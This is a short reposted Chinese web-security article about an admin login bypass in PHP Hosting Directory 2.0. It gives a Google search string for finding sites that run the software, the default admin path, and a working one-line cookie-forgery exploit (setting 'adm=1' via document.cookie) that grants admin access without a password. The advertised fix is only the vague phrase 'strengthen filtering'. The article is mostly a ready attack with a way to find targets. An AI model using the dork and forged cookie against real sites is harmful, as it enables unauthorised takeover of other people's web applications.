好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

PHP Hosting Directory 2.0 后台验证绕过漏洞及修复 -

PHP Hosting Directory 2.0 程序后台验证不严格,导致可绕过密码验证登录后台。

Google: "powered by PHP Hosting Directory 2.0"

默认后台:http://127.0.0.1/admin

利用方法:

不需要输入任何密码,通过cookie欺骗进入后台。

javascript:document.cookie = "adm=1; path=/";

重新刷新即可登录后台控制面板。

 

修复方案:

加强过滤

查看更多关于PHP Hosting Directory 2.0 后台验证绕过漏洞及修复 -的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11175
  阅读:49次

上一篇: 关于evercookie - 网站安全 - 自学php

下一篇:征途SQL注入及修复 - 网站安全 - 自学php

相关资讯